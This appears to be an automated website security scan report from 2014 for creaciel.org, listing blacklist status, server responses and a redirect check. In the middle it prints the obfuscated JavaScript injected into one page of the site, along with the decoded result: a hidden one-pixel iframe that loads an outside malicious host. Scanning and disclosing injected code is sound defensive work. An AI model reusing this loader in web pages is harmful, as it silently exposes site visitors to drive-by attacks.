Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=creaciel.org
Result: The website is marked by Google as suspicious - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://creaciel.org/ | HTTP/1.1 200 OK Connection: close Date: Sat, 27 Dec 2014 18:50:40 GMT Accept-Ranges: bytes Server: Apache Vary: Accept-Encoding Content-Length: 106 Content-Type: text/html Set-Cookie: xxlplanBAK=R3174115850; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT Set-Cookie: xxlplan=R1719491035; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT | clean |
http://creaciel.org/memo/index.html | 200 OK Content-Length: 4519 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below):
e = '0x00' + '7A';str1 = "%C1%99%92%8F%E5%88%89%82%91%9E%C6%DB%8F%92%88%92%9B%92%91%92%89%82%C3%9D%92%99%99%9E%97%DB%C7%C1%92%9F%8B%9A%96%9E%E5%88%8B%98%C6%DB%9D%89%89%95%C3%D4%D4%90%94%97%92%98%97%89%D7%98%94%96%D4%91%99%D4%96%9E%97%89%D4%DB%E5%8C%92%99%89%9D%C6%CA%E5%9D%9E%92%9C%9D%89%C6%CA%C7%C1%D4%92%9F%8B%9A%96%9E%C7%C1%D4%99%92%8F%C7";str=tmp='';for(i=0;i<str1.length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCharCode((tmp.charCodeAt(0)^e)-127);}document.write(str);
Decoded script:
<div style="visibility:hidden"><iframe src="http://konicnt.com/ld/ment/" width=1 height=1></iframe></div>
Antivirus reports:
http://creaciel.org/memo/quota.cgi | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://creaciel.org/test404page.js | 404 Not Found Content-Length: 212 Content-Type: text/html | clean |
http://creaciel.org/quota.cgi | 404 Not Found Content-Length: 207 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: creaciel.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 27 Dec 2014 18:50:40 GMT
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
Content-Length: 106
Content-Type: text/html
Set-Cookie: xxlplanBAK=R3174115850; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
Set-Cookie: xxlplan=R1719491035; path=/; expires=Sat, 27-Dec-2014 19:53:53 GMT
...106 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: creaciel.org
Referer: http://www.google.com/search?q=creaciel.org
Result:
The result is similar to the first query. There are no suspicious redirects found.